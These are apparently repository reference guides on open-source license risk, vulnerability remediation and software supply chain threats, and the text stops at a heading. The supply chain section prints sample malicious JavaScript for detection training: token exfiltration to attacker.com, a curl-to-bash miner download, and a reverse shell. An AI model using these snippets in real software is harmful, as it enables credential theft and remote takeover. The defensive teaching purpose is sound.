- Allows proprietary applications if library used as separate component
- Source modifications must be released
**Business Impact**: MEDIUM
- Safe if used as unmodified library (dynamic linking)
- Modifications require open-sourcing
- License compatibility considerations
**Compliance Requirements**:
- Keep library as separate, unmodified component
- If modified, release modifications under same license
- Attribute properly in documentation
**Example Safe Usage**:
```
Product: Commercial Application
Dependency: LGPL library via dynamic linking
Status: COMPLIANT
Reason: No modifications, used as separate component
```
### Low Risk - Permissive
**Licenses**: MIT, Apache-2.0, BSD-2-Clause, BSD-3-Clause
**Characteristics**:
- Minimal restrictions on use and distribution
- No copyleft requirements
- Attribution required
- Apache-2.0 includes patent grant
**Business Impact**: LOW
- Generally safe for commercial use
- Simple compliance requirements
- Industry standard for most projects
**Compliance Requirements**:
- Include license text in distribution
- Preserve copyright notices
- Apache-2.0: Include NOTICE file if present
### Minimal Risk - Public Domain / Unlicense
**Licenses**: CC0-1.0, Unlicense, Public Domain
**Characteristics**:
- No restrictions
- No attribution required (though recommended)
**Business Impact**: MINIMAL
- Safest for commercial use
- No compliance obligations
## Common Open Source Licenses
### Permissive Licenses
#### MIT License
**SPDX**: MIT
**OSI Approved**: Yes
**Risk Level**: LOW
**Permissions**: Commercial use, modification, distribution, private use
**Conditions**: Include license and copyright notice
**Limitations**: No liability, no warranty
**Common in**: JavaScript (React, Angular), Ruby (Rails)
**Compliance Checklist**:
- [ ] Include LICENSE file in distribution
- [ ] Preserve copyright notices in source files
- [ ] Credit in ABOUT/CREDITS file
#### Apache License 2.0
**SPDX**: Apache-2.0
**OSI Approved**: Yes
**Risk Level**: LOW
**Permissions**: Same as MIT, plus explicit patent grant
**Conditions**: Include license, preserve NOTICE file, state changes
**Limitations**: No trademark use, no liability
**Common in**: Java (Spring), Big Data (Hadoop, Kafka)
**Key Difference from MIT**: Patent protection clause
**Compliance Checklist**:
- [ ] Include LICENSE file
- [ ] Include NOTICE file if present
- [ ] Document modifications
- [ ] Don't use project trademarks
#### BSD Licenses (2-Clause and 3-Clause)
**SPDX**: BSD-2-Clause, BSD-3-Clause
**OSI Approved**: Yes
**Risk Level**: LOW
**3-Clause Addition**: No endorsement using project name
**Common in**: Unix utilities, networking libraries
**Compliance Checklist**:
- [ ] Include license text
- [ ] Preserve copyright notices
- [ ] BSD-3: No unauthorized endorsements
### Weak Copyleft Licenses
#### GNU LGPL 2.1 / 3.0
**SPDX**: LGPL-2.1, LGPL-3.0
**OSI Approved**: Yes
**Risk Level**: MEDIUM
**Safe Usage Patterns**:
1. **Dynamic Linking**: Link as shared library without modification
2. **Unmodified Use**: Use library as-is without code changes
3. **Separate Component**: Keep as distinct, replaceable module
**Unsafe Usage Patterns**:
1. **Static Linking**: Compiling LGPL code into proprietary binary
2. **Modifications**: Changing LGPL library code
3. **Intimate Integration**: Tightly coupling with proprietary code
**Common in**: GTK, glibc, Qt (dual-licensed)
**Compliance for Unmodified Use**:
- [ ] Provide library source code or offer to provide
- [ ] Allow users to replace library
- [ ] Include license text
**Compliance for Modifications**:
- [ ] Release modifications under LGPL
- [ ] Provide modified source code
- [ ] Document changes
#### Mozilla Public License 2.0
**SPDX**: MPL-2.0
**OSI Approved**: Yes
**Risk Level**: MEDIUM
**File-Level Copyleft**: Only modified files must remain MPL
**Common in**: Firefox, Rust standard library
**Compliance**:
- [ ] Keep MPL files in separate files
- [ ] Release modifications to MPL files
- [ ] May combine with proprietary code at module level
### Strong Copyleft Licenses
#### GNU GPL 2.0 / 3.0
**SPDX**: GPL-2.0, GPL-3.0
**OSI Approved**: Yes
**Risk Level**: HIGH
**Copyleft Scope**: Entire program must be GPL
**Key Differences**:
- **GPL-3.0**: Added anti-tivoization, patent provisions
- **GPL-2.0**: More permissive for hardware restrictions
**Common in**: Linux kernel (GPL-2.0), many GNU tools
**When GPL is Acceptable**:
1. **Internal Use**: Not distributed outside organization
2. **Network Boundary**: Separate GPL service (API-based)
3. **Dual-Licensed**: Use commercial license option
**Compliance if Using**:
- [ ] Entire program must be GPL-compatible
- [ ] Provide source code to recipients
- [ ] Include license and build instructions
#### GNU AGPL 3.0
**SPDX**: AGPL-3.0
**OSI Approved**: Yes
**Risk Level**: CRITICAL for SaaS
**Network Copyleft**: Source code required even for network use
**Common in**: Some database tools, server software
**Critical for**: SaaS, web applications, APIs
**Avoid Unless**: Prepared to open-source entire application
### Proprietary / Commercial Licenses
**Risk Level**: VARIES (requires legal review)
**Common Scenarios**:
- Evaluation/trial licenses (non-production)
- Dual-licensed (commercial option available)
- Runtime licenses (e.g., database drivers)
**Compliance**: Follow vendor-specific terms
## License Compatibility
### Compatibility Matrix
| Your Project | MIT | Apache-2.0 | LGPL | GPL | AGPL |
|--------------|-----|-----------|------|-----|------|
| Proprietary | ✅ | ✅ | ⚠️ | ❌ | ❌ |
| MIT | ✅ | ✅ | ⚠️ | ❌ | ❌ |
| Apache-2.0 | ✅ | ✅ | ⚠️ | ⚠️ | ❌ |
| LGPL | ✅ | ✅ | ✅ | ⚠️ | ❌ |
| GPL | ✅ | ⚠️ | ✅ | ✅ | ⚠️ |
| AGPL | ✅ | ⚠️ | ✅ | ✅ | ✅ |
**Legend**:
- ✅ Compatible
- ⚠️ Compatible with conditions
- ❌ Incompatible
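For automated checks, the matrix can be encoded as a lookup table; the sketch below mirrors a few rows of the table (remaining rows omitted for brevity) and is illustrative only, not legal advice:
```python
# ok / conditional / incompatible, mirroring the matrix above (keys: your project's license)
COMPAT = {
    "Proprietary": {"MIT": "ok", "Apache-2.0": "ok", "LGPL": "conditional", "GPL": "incompatible", "AGPL": "incompatible"},
    "MIT":         {"MIT": "ok", "Apache-2.0": "ok", "LGPL": "conditional", "GPL": "incompatible", "AGPL": "incompatible"},
    "Apache-2.0":  {"MIT": "ok", "Apache-2.0": "ok", "LGPL": "conditional", "GPL": "conditional", "AGPL": "incompatible"},
}

def check_dependency(project_license: str, dependency_license: str) -> str:
    return COMPAT.get(project_license, {}).get(dependency_license, "unknown - review manually")

print(check_dependency("Proprietary", "AGPL"))  # -> "incompatible"
```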
### Common Incompatibilities
**Apache-2.0 with GPL-2.0**:
- Issue: GPL-2.0 doesn't have explicit patent grant
- Solution: Use GPL-3.0 instead (compatible with Apache-2.0)
**GPL with Proprietary**:
- Issue: GPL requires derivative works be GPL
- Solution: Keep as separate program, use network boundary
**AGPL with SaaS**:
- Issue: AGPL triggers on network use
- Solution: Avoid AGPL or use commercial license
## Compliance Workflows
### Initial License Assessment
1. **Scan Dependencies**
```bash
scripts/blackduck_scan.py --project MyApp --version 1.0.0 --report-type license
```
2. **Categorize Licenses by Risk**
- Review all HIGH risk licenses immediately
- Assess MEDIUM risk licenses for compliance requirements
- Document LOW risk licenses for attribution
3. **Legal Review**
- Escalate HIGH risk licenses to legal team
- Get approval for MEDIUM risk usage patterns
- Document decisions
### Continuous License Monitoring
**In CI/CD Pipeline**:
```yaml
# GitHub Actions example
- name: License Compliance Check
run: |
scripts/blackduck_scan.py \
--project ${{ github.repository }} \
--version ${{ github.sha }} \
--report-type license \
--fail-on-blocklisted-licenses
```
**Policy Enforcement**:
- Block builds with GPL/AGPL dependencies
- Require approval for new LGPL dependencies
- Auto-approve MIT/Apache-2.0
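A minimal sketch of such a gate, assuming the scan step has produced a JSON list of detected licenses (the file format shown is illustrative, not a Black Duck export format):
```python
import json
import sys

BLOCKLIST = {"GPL-2.0", "GPL-3.0", "AGPL-3.0"}        # fail the build
NEEDS_APPROVAL = {"LGPL-2.1", "LGPL-3.0", "MPL-2.0"}  # require manual review

def gate(report_path: str) -> int:
    # Expected shape: [{"component": "name@version", "license": "SPDX-ID"}, ...]
    components = json.load(open(report_path))
    blocked = [c for c in components if c["license"] in BLOCKLIST]
    review = [c for c in components if c["license"] in NEEDS_APPROVAL]
    for c in blocked:
        print(f"BLOCKED: {c['component']} ({c['license']})")
    for c in review:
        print(f"REVIEW REQUIRED: {c['component']} ({c['license']})")
    return 1 if blocked else 0

if __name__ == "__main__":
    sys.exit(gate(sys.argv[1]))
```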
### License Remediation
**For High-Risk Licenses**:
1. **Replace Component**
- Find MIT/Apache alternative
- Example: MySQL (GPL) → PostgreSQL (PostgreSQL License - permissive)
2. **Commercial License**
- Purchase commercial license if available
- Example: Qt (LGPL or Commercial)
3. **Separate Service**
- Run GPL component as separate service
- Communicate via API/network
4. **Remove Dependency**
- Implement functionality directly
- Use different approach
### Attribution and Notices
**Required Artifacts**:
**LICENSES.txt** - All license texts:
```
This software includes the following third-party components:
1. Component Name v1.0.0
License: MIT
Copyright (c) 2024 Author
[Full license text]
2. Another Component v2.0.0
License: Apache-2.0
[Full license text]
```
**NOTICE.txt** - Attribution notices (if Apache-2.0 dependencies):
```
This product includes software developed by
The Apache Software Foundation (http://www.apache.org/).
[Additional NOTICE content from Apache-licensed dependencies]
```
**UI/About Screen**:
- List major third-party components
- Link to full license information
- Provide "Open Source Licenses" section
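Producing these artifacts is straightforward to automate from an SBOM or dependency export; a minimal sketch, assuming a simple JSON inventory with illustrative field names:
```python
import json

def write_licenses_file(inventory_path: str, output_path: str = "LICENSES.txt") -> None:
    # Expected shape: [{"name": ..., "version": ..., "license": ..., "copyright": ..., "license_text": ...}]
    components = json.load(open(inventory_path))
    with open(output_path, "w") as out:
        out.write("This software includes the following third-party components:\n\n")
        for i, c in enumerate(components, 1):
            out.write(f"{i}. {c['name']} v{c['version']}\n")
            out.write(f"   License: {c['license']}\n")
            out.write(f"   {c.get('copyright', '')}\n\n")
            out.write(c["license_text"] + "\n\n")
```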
## Legal Considerations
### When to Consult Legal Counsel
**Always Consult for**:
- GPL/AGPL in commercial products
- Dual-licensing decisions
- Patent-related concerns
- Proprietary license negotiations
- M&A due diligence
- License violations/disputes
### Common Legal Questions
**Q: Can I use GPL code in a SaaS application?**
A: GPL-2.0/3.0 yes (no distribution), AGPL-3.0 no (network use triggers copyleft)
**Q: What if I modify an MIT-licensed library?**
A: You can keep modifications proprietary, just preserve MIT license
**Q: Can I remove license headers from code?**
A: No, preserve all copyright and license notices
**Q: What's the difference between "linking" and "use"?**
A: Legal concept varies by jurisdiction; consult attorney for specific cases
### Audit and Compliance Documentation
**Maintain Records**:
- Complete SBOM with license information
- License review approvals
- Component selection rationale
- Exception approvals with expiration dates
**Quarterly Review**:
- Update license inventory
- Review new dependencies
- Renew/revoke exceptions
- Update attribution files
## Tools and Resources
**Black Duck Features**:
- Automated license detection
- License risk categorization
- Policy enforcement
- Bill of Materials with licenses
**Additional Tools**:
- FOSSA - License compliance automation
- WhiteSource - License management
- Snyk - License scanning
**Resources**:
- [SPDX License List](https://spdx.org/licenses/)
- [Choose A License](https://choosealicense.com/)
- [TL;DR Legal](https://tldrlegal.com/)
- [OSI Approved Licenses](https://opensource.org/licenses)
## License Risk Scorecard Template
```markdown
# License Risk Assessment: [Component Name]
**Component**: component-name@version
**License**: [SPDX ID]
**Risk Level**: [HIGH/MEDIUM/LOW]
## Usage Context
- [ ] Used in distributed product
- [ ] Used in SaaS/cloud service
- [ ] Internal tool only
- [ ] Modifications made: [Yes/No]
## Risk Assessment
- **Copyleft Trigger**: [Yes/No/Conditional]
- **Patent Concerns**: [Yes/No]
- **Commercial Use Allowed**: [Yes/No]
## Compliance Requirements
- [ ] Include license text
- [ ] Provide source code
- [ ] Include NOTICE file
- [ ] Preserve copyright notices
- [ ] Other: _______
## Decision
- [X] Approved for use
- [ ] Requires commercial license
- [ ] Find alternative
- [ ] Legal review pending
**Approved By**: [Name, Date]
**Review Date**: [Date]
```
## References
- [Open Source Initiative](https://opensource.org/)
- [Free Software Foundation](https://www.fsf.org/licensing/)
- [Linux Foundation - Open Compliance Program](https://www.linuxfoundation.org/projects/open-compliance)
- [Google Open Source License Guide](https://opensource.google/documentation/reference/thirdparty/licenses)

View File

@@ -0,0 +1,496 @@
# Vulnerability Remediation Strategies
## Table of Contents
- [Remediation Decision Framework](#remediation-decision-framework)
- [Strategy 1: Upgrade to Fixed Version](#strategy-1-upgrade-to-fixed-version)
- [Strategy 2: Apply Security Patch](#strategy-2-apply-security-patch)
- [Strategy 3: Replace Component](#strategy-3-replace-component)
- [Strategy 4: Implement Mitigations](#strategy-4-implement-mitigations)
- [Strategy 5: Risk Acceptance](#strategy-5-risk-acceptance)
- [Language-Specific Guidance](#language-specific-guidance)
## Remediation Decision Framework
```
Is patch/upgrade available?
├─ Yes → Can we upgrade without breaking changes?
│ ├─ Yes → UPGRADE (Strategy 1)
│ └─ No → Are breaking changes acceptable?
│ ├─ Yes → UPGRADE with refactoring (Strategy 1)
│ └─ No → Can we apply patch? (Strategy 2)
│ ├─ Yes → PATCH
│ └─ No → REPLACE or MITIGATE (Strategy 3/4)
└─ No → Is vulnerability exploitable in our context?
├─ Yes → Can we replace component?
│ ├─ Yes → REPLACE (Strategy 3)
│ └─ No → MITIGATE (Strategy 4)
└─ No → ACCEPT with justification (Strategy 5)
```
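The same framework can be read as a small decision function; the sketch below is a direct transcription of the tree, with each question as a boolean argument:
```python
def select_strategy(
    patch_available: bool,
    upgrade_is_nonbreaking: bool,
    breaking_changes_acceptable: bool,
    patch_applicable: bool,
    exploitable_in_context: bool,
    replacement_available: bool,
) -> str:
    # Mirrors the decision framework above
    if patch_available:
        if upgrade_is_nonbreaking or breaking_changes_acceptable:
            return "Strategy 1: Upgrade"
        if patch_applicable:
            return "Strategy 2: Patch"
        return "Strategy 3/4: Replace or Mitigate"
    if exploitable_in_context:
        return "Strategy 3: Replace" if replacement_available else "Strategy 4: Mitigate"
    return "Strategy 5: Accept with justification"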
## Strategy 1: Upgrade to Fixed Version
**When to use**: Patch available in newer version, upgrade path is clear
**Priority**: HIGHEST - This is the preferred remediation method
### Upgrade Process
1. **Identify Fixed Version**
```bash
# Check Black Duck scan results for fixed version
# Verify in CVE database or component changelog
```
2. **Review Breaking Changes**
- Read release notes and changelog
- Check migration guides
- Review API changes and deprecations
3. **Update Dependency**
**Node.js/npm**:
```bash
npm install package-name@fixed-version
npm audit fix # Auto-fix where possible
```
**Python/pip**:
```bash
pip install package-name==fixed-version
pip-audit --fix # Auto-fix vulnerabilities
```
**Java/Maven**:
```xml
<dependency>
<groupId>org.example</groupId>
<artifactId>vulnerable-lib</artifactId>
<version>fixed-version</version>
</dependency>
```
**Ruby/Bundler**:
```bash
bundle update package-name
```
**.NET/NuGet**:
```bash
dotnet add package PackageName --version fixed-version
```
4. **Test Thoroughly**
- Run existing test suite
- Test affected functionality
- Perform integration testing
- Consider security-specific test cases
5. **Re-scan**
```bash
scripts/blackduck_scan.py --project MyApp --version 1.0.1
```
### Handling Breaking Changes
**Minor Breaking Changes**: Acceptable for security fixes
- Update function calls to new API
- Adjust configuration for new defaults
- Update type definitions
**Major Breaking Changes**: Requires planning
- Create feature branch for upgrade
- Refactor code incrementally
- Use adapter pattern for compatibility
- Consider gradual rollout
**Incompatible Changes**: May require alternative strategy
- Evaluate business impact
- Consider Strategy 3 (Replace)
- If critical, implement Strategy 4 (Mitigate) temporarily
## Strategy 2: Apply Security Patch
**When to use**: Vendor provides patch without full version upgrade
**Priority**: HIGH - Use when full upgrade is not feasible
### Patch Types
**Backported Patches**:
- Vendor provides patch for older version
- Common in LTS/enterprise distributions
- Apply using vendor's instructions
**Custom Patches**:
- Create patch from upstream fix
- Test extensively before deployment
- Document patch application process
### Patch Application Process
1. **Obtain Patch**
- Vendor security advisory
- GitHub commit/pull request
- Security mailing list
2. **Validate Patch**
```bash
# Review patch contents
git diff vulnerable-version..patched-version -- affected-file.js
# Verify patch signature if available
gpg --verify patch.sig patch.diff
```
3. **Apply Patch**
**Git-based**:
```bash
# Apply patch from file
git apply security-patch.diff
# Or cherry-pick specific commit
git cherry-pick security-fix-commit-sha
```
**Package manager overlay**:
```bash
# npm patch-package
npx patch-package package-name
# pip with local modifications
pip install -e ./patched-package
```
4. **Test and Verify**
- Verify vulnerability is fixed
- Run security scan
- Test functionality
5. **Document Patch**
- Create internal documentation
- Add to dependency management notes
- Set reminder for proper upgrade
## Strategy 3: Replace Component
**When to use**: No fix available, or component is unmaintained
**Priority**: MEDIUM-HIGH - Architectural change required
### Replacement Process
1. **Identify Alternatives**
**Evaluation Criteria**:
- Active maintenance (recent commits, releases)
- Security track record
- Community size and support
- Feature parity
- License compatibility
- Performance characteristics
**Research Sources**:
- Black Duck component quality metrics
- GitHub stars/forks/issues
- Security advisories history
- StackOverflow activity
- Production usage at scale
2. **Select Replacement**
**Example Replacements**:
| Vulnerable Component | Alternative | Reason |
|---------------------|-------------|--------|
| moment.js | date-fns, dayjs | No longer maintained |
| request (npm) | axios, node-fetch | Deprecated |
| xml2js | fast-xml-parser | XXE vulnerabilities |
| lodash (full) | lodash-es (specific functions) | Reduce attack surface |
3. **Plan Migration**
- Map API differences
- Identify all usage locations
- Create compatibility layer if needed (see the adapter sketch at the end of this strategy)
- Plan gradual migration if large codebase
4. **Execute Replacement**
```bash
# Remove vulnerable component
npm uninstall vulnerable-package
# Install replacement
npm install secure-alternative
# Update imports/requires across codebase
# Use tools like jscodeshift for automated refactoring
```
5. **Verify**
- Scan for residual references
- Test all affected code paths
- Re-scan with Black Duck
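Where step 3 calls for a compatibility layer, a thin adapter module keeps call sites stable while the underlying library is swapped. The sketch below uses hypothetical package and function names purely for illustration:
```python
# http_adapter.py: call sites import get_json from here instead of from either
# library, so replacing the vulnerable dependency touches exactly one file.
# Both module names below are hypothetical placeholders.
try:
    from secure_alternative import fetch as _fetch    # replacement package
except ImportError:                                    # fall back while migrating
    from vulnerable_package import fetch as _fetch     # legacy package being removed

def get_json(url: str, timeout: float = 10.0) -> dict:
    # Single stable entry point for the rest of the codebase
    return _fetch(url, timeout=timeout).json()
```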
## Strategy 4: Implement Mitigations
**When to use**: No fix/replacement available, vulnerability cannot be eliminated
**Priority**: MEDIUM - Compensating controls required
### Mitigation Techniques
#### Input Validation and Sanitization
For injection vulnerabilities:
```javascript
// Before: Vulnerable to injection
const result = eval(userInput);
// Mitigation: Strict validation and safe alternatives
const allowlist = ['option1', 'option2'];
if (!allowlist.includes(userInput)) {
throw new Error('Invalid input');
}
const result = safeEvaluate(userInput);
```
#### Network Segmentation
For RCE/SSRF vulnerabilities:
- Deploy vulnerable component in isolated network segment
- Restrict outbound network access
- Use Web Application Firewall (WAF) rules
- Implement egress filtering
#### Access Controls
For authentication/authorization bypasses:
```python
# Additional validation layer
@require_additional_auth
def sensitive_operation():
# Vulnerable library call
vulnerable_lib.do_operation()
```
#### Runtime Protection
**Application Security Tools**:
- RASP (Runtime Application Self-Protection)
- Virtual patching via WAF
- Container security policies
**Example - WAF Rule**:
```nginx
# ModSecurity rule to block exploitation attempt
SecRule REQUEST_URI "@rx /vulnerable-endpoint" \
"id:1001,phase:1,deny,status:403,\
msg:'Blocked access to vulnerable component'"
```
#### Minimize Attack Surface
**Disable Vulnerable Features**:
```java
import javax.xml.parsers.DocumentBuilderFactory;

// Disable XXE at the parser factory; these features must be set in code,
// since DocumentBuilderFactory has no declarative "features" map property
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
```
**Remove Unused Code**:
```bash
# Remove unused dependencies
npm prune
pip-autoremove
# Tree-shake unused code
webpack --mode production # Removes unused exports
```
### Monitoring and Detection
Implement enhanced monitoring for vulnerable components:
```python
# Example: Log and alert on vulnerable code path usage
import inspect
import logging
def wrap_vulnerable_function(original_func):
def wrapper(*args, **kwargs):
logging.warning(
"SECURITY: Vulnerable function called",
extra={
"function": original_func.__name__,
"args": args,
"caller": inspect.stack()[1]
}
)
# Alert security team
send_security_alert("Vulnerable code path executed")
return original_func(*args, **kwargs)
return wrapper
# Apply wrapper
vulnerable_lib.dangerous_function = wrap_vulnerable_function(
vulnerable_lib.dangerous_function
)
```
## Strategy 5: Risk Acceptance
**When to use**: Vulnerability is not exploitable in your context, or risk is acceptable
**Priority**: LOWEST - Only after thorough risk analysis
### Risk Acceptance Criteria
**Acceptable when ALL of these are true**:
1. Vulnerability is not exploitable in deployment context
2. Attack requires significant preconditions (e.g., admin access)
3. Vulnerable code path is never executed
4. Impact is negligible even if exploited
5. Mitigation cost exceeds risk
### Risk Acceptance Process
1. **Document Justification**
```markdown
# Risk Acceptance: CVE-2023-XXXXX in component-name
**Vulnerability**: SQL Injection in admin panel
**CVSS Score**: 8.5 (HIGH)
**Component**: admin-dashboard@1.2.3
**Justification for Acceptance**:
- Admin panel is only accessible to authenticated administrators
- Additional authentication layer required (2FA)
- Network access restricted to internal network only
- No sensitive data accessible via this component
- Monitoring in place for suspicious activity
**Mitigation Controls**:
- WAF rules blocking SQL injection patterns
- Enhanced logging on admin endpoints
- Network segmentation
- Regular security audits
**Review Date**: 2024-06-01
**Approved By**: CISO, Security Team Lead
**Next Review**: 2024-09-01
```
2. **Implement Compensating Controls**
- Enhanced monitoring
- Additional authentication layers
- Network restrictions
- Regular security reviews
3. **Set Review Schedule**
- Quarterly reviews for HIGH/CRITICAL
- Semi-annual for MEDIUM
- Annual for LOW
4. **Track in Black Duck**
```bash
# Mark as accepted risk in Black Duck with expiration
# Use Black Duck UI or API to create policy exception
```
## Language-Specific Guidance
### JavaScript/Node.js
**Tools**:
- `npm audit` - Built-in vulnerability scanner
- `npm audit fix` - Automatic remediation
- `yarn audit` - Yarn's vulnerability scanner
- `snyk` - Commercial SCA tool
**Best Practices**:
- Lock dependencies with `package-lock.json`
- Use `npm ci` in CI/CD for reproducible builds
- Audit transitive dependencies
- Consider `npm-force-resolutions` for forcing versions
### Python
**Tools**:
- `pip-audit` - Scan for vulnerabilities
- `safety` - Check against vulnerability database
- `pip-check` - Verify package compatibility
**Best Practices**:
- Use `requirements.txt` and `pip freeze`
- Pin exact versions for security-critical deps
- Use virtual environments
- Consider `pip-tools` for dependency management
### Java
**Tools**:
- OWASP Dependency-Check
- Snyk for Java
- Black Duck (commercial)
**Best Practices**:
- Use dependency management (Maven, Gradle)
- Lock versions in `pom.xml` or `build.gradle`
- Scan with `mvn dependency:tree` for transitive deps
- Use Maven Enforcer Plugin for version policies
### .NET
**Tools**:
- `dotnet list package --vulnerable`
- OWASP Dependency-Check
- WhiteSource Bolt
**Best Practices**:
- Use `PackageReference` in project files
- Lock versions with `packages.lock.json`
- Enable NuGet package validation
- Use `dotnet outdated` to track updates
### Ruby
**Tools**:
- `bundle audit` - Check for vulnerabilities
- `bundler-audit` - Automated checking
**Best Practices**:
- Use `Gemfile.lock` for reproducible deps
- Run `bundle audit` in CI/CD
- Update regularly with `bundle update`
- Use pessimistic version constraints
## Remediation Workflow Checklist
For each vulnerability:
- [ ] Identify vulnerability details (CVE, CVSS, affected versions)
- [ ] Determine if vulnerability is exploitable in your context
- [ ] Check for fixed version or patch availability
- [ ] Assess upgrade/patch complexity and breaking changes
- [ ] Select remediation strategy (Upgrade/Patch/Replace/Mitigate/Accept)
- [ ] Create remediation plan with timeline
- [ ] Execute remediation
- [ ] Test thoroughly (functionality + security)
- [ ] Re-scan with Black Duck to confirm fix
- [ ] Document changes and lessons learned
- [ ] Deploy to production with rollback plan
- [ ] Monitor for issues post-deployment
## References
- [NIST Vulnerability Management Guide](https://nvd.nist.gov/)
- [OWASP Dependency Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html)
- [CISA Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- [Snyk Vulnerability Database](https://security.snyk.io/)

View File

@@ -0,0 +1,588 @@
# Supply Chain Security Threats
## Table of Contents
- [Threat Overview](#threat-overview)
- [Attack Vectors](#attack-vectors)
- [Detection Strategies](#detection-strategies)
- [Prevention and Mitigation](#prevention-and-mitigation)
- [Incident Response](#incident-response)
## Threat Overview
Supply chain attacks target the software dependency ecosystem to compromise applications through malicious or vulnerable third-party components.
**Impact**: Critical - can affect thousands of downstream users
**Trend**: Increasing rapidly (651% increase 2021-2022)
**MITRE ATT&CK**: T1195 - Supply Chain Compromise
### Attack Categories
1. **Compromised Dependencies** - Legitimate packages backdoored by attackers
2. **Typosquatting** - Malicious packages with similar names
3. **Dependency Confusion** - Exploiting package resolution order
4. **Malicious Maintainers** - Attackers become maintainers
5. **Build System Compromise** - Injection during build/release process
## Attack Vectors
### 1. Dependency Confusion
**MITRE ATT&CK**: T1195.001
**CWE**: CWE-494 (Download of Code Without Integrity Check)
**Attack Description**:
Attackers publish malicious packages to public registries under the same names as internal packages. Package managers may then resolve and install the public version instead of the internal one.
**Real-World Examples**:
- **2021**: Researcher Alex Birsan demonstrated the attack by uploading packages that mimicked internal package names used at Microsoft, Apple, and PayPal
- **Impact**: Potential code execution on build servers
**Attack Pattern**:
```
Internal Package Registry (private):
- company-auth-lib@1.0.0
Public Registry (npmjs.com):
- company-auth-lib@99.0.0 (MALICIOUS)
Package manager resolution:
npm install company-auth-lib
→ Installs v99.0.0 from public registry (higher version)
```
**Detection with Black Duck**:
- Unexpected package source changes
- Version spikes (jumping from 1.x to 99.x)
- Multiple registries for same package
- New publishers for established packages
**Prevention**:
```bash
# npm - use scoped packages for internal code
npm config set @company:registry https://npm.internal.company.com
# Configure .npmrc to prefer internal registry
@company:registry=https://npm.internal.company.com
registry=https://registry.npmjs.org
# Python - use index-url for internal PyPI
pip install --index-url https://pypi.internal.company.com package-name
# Maven - repository order matters
<repositories>
<repository>
<id>company-internal</id>
<url>https://maven.internal.company.com</url>
</repository>
</repositories>
```
**Mitigation**:
- Use scoped/namespaced packages (@company/package-name)
- Configure package manager to prefer internal registry
- Reserve public names for internal packages
- Implement allowlists for external packages
- Pin dependency versions
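The version-spike and registry-overlap indicators above can be approximated with a simple comparison; in the sketch below the versions are passed in directly, but in practice they would come from your internal and public registry APIs:
```python
from typing import List, Optional

def check_confusion_risk(package: str, internal_version: str,
                         public_version: Optional[str]) -> List[str]:
    """Flag signals that a public package may be shadowing an internal one."""
    findings = []
    if public_version is None:
        return findings  # name not present publicly: no confusion risk
    findings.append(f"{package}: name also exists on the public registry")
    internal_major = int(internal_version.split(".")[0])
    public_major = int(public_version.split(".")[0])
    if public_major > internal_major + 10:
        findings.append(f"{package}: suspicious version spike "
                        f"({internal_version} -> {public_version})")
    return findings

print(check_confusion_risk("company-auth-lib", "1.0.0", "99.0.0"))
```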
### 2. Typosquatting
**MITRE ATT&CK**: T1195.001
**CWE**: CWE-829 (Untrusted Control Sphere)
**Attack Description**:
Malicious packages with names similar to popular packages, relying on typos during installation.
**Real-World Examples**:
- **crossenv** (mimicking cross-env) - 700+ downloads before removal
- **electorn** (mimicking electron) - credential stealer
- **python3-dateutil** (mimicking python-dateutil) - SSH and GPG key stealer
**Common Typosquatting Patterns**:
- Missing/extra character: `requsts` vs `requests`
- Substituted character: `requezts` vs `requests`
- Transposed characters: `reqeusts` vs `requests`
- Homoglyphs: `requ𝗲sts` vs `requests` (Unicode lookalikes)
- Namespace confusion: `@npm/lodash` vs `lodash`
**Detection**:
- Levenshtein distance analysis on new dependencies
- Check package popularity and age
- Review package maintainer history
- Verify package repository URL
**Black Duck Detection**:
```python
# Component quality indicators
- Download count (typosquats typically low)
- Creation date (recent for established functionality)
- Maintainer reputation
- GitHub stars/forks (legitimate packages have more)
```
**Prevention**:
- Use dependency lock files (package-lock.json, yarn.lock)
- Code review for new dependencies
- Automated typosquatting detection tools
- IDE autocomplete from verified sources
### 3. Compromised Maintainer Accounts
**MITRE ATT&CK**: T1195.002
**CWE**: CWE-1294 (Insecure Security Identifier)
**Attack Description**:
Attackers gain access to legitimate maintainer accounts through credential compromise, then publish malicious versions.
**Real-World Examples**:
- **event-stream (2018)**: Maintainer handed over to attacker, malicious code added
- **ua-parser-js (2021)**: Hijacked to deploy cryptocurrency miner
- **coa, rc (2021)**: Password spraying attack on maintainer accounts
**Attack Indicators**:
- Unexpected version releases
- New maintainers added
- Changed package repository URLs
- Sudden dependency additions
- Obfuscated code in updates
- Behavioral changes (network calls, file system access)
**Detection with Black Duck**:
```
Monitor for:
- Maintainer changes
- Unusual release patterns
- Security score degradation
- New external dependencies
- Build process changes
```
**Prevention**:
- Enable 2FA/MFA for registry accounts
- Use hardware security keys
- Registry account monitoring/alerts
- Code signing for packages
- Review release process changes
### 4. Malicious Dependencies (Direct Injection)
**MITRE ATT&CK**: T1195.001
**Attack Description**:
Entirely malicious packages created by attackers, often using SEO or social engineering to drive adoption.
**Real-World Examples**:
- **event-stream → flatmap-stream (2018)**: Injected Bitcoin wallet stealer
- **bootstrap-sass (malicious version)**: Backdoored release enabling remote code execution
- **eslint-scope (2018)**: Credential stealer via compromised account
**Common Malicious Behaviors**:
- Credential harvesting (env vars, config files)
- Cryptocurrency mining
- Backdoor installation
- Data exfiltration
- Command & control communication
**Example Malicious Code Patterns**:
```javascript
// Environment variable exfiltration
const secrets = {
npm_token: process.env.NPM_TOKEN,
aws_key: process.env.AWS_ACCESS_KEY_ID,
github_token: process.env.GITHUB_TOKEN
};
fetch('https://attacker.com/collect', {
method: 'POST',
body: JSON.stringify(secrets)
});
// Cryptocurrency miner
const { exec } = require('child_process');
exec('curl http://attacker.com/miner.sh | bash');
// Backdoor
const net = require('net');
const { spawn } = require('child_process');
const shell = spawn('/bin/bash', []);
net.connect(4444, 'attacker.com', function() {
this.pipe(shell.stdin);
shell.stdout.pipe(this);
});
```
**Detection**:
- Network activity during install (install scripts shouldn't make external calls)
- File system modifications outside package directory
- Process spawning during installation
- Obfuscated or minified code in source packages
- Suspicious dependencies for package scope
**Black Duck Indicators**:
- Low community adoption for claimed functionality
- Recent creation date
- Lack of GitHub repository or activity
- Poor code quality metrics
- No documentation or minimal README
### 5. Build System Compromise
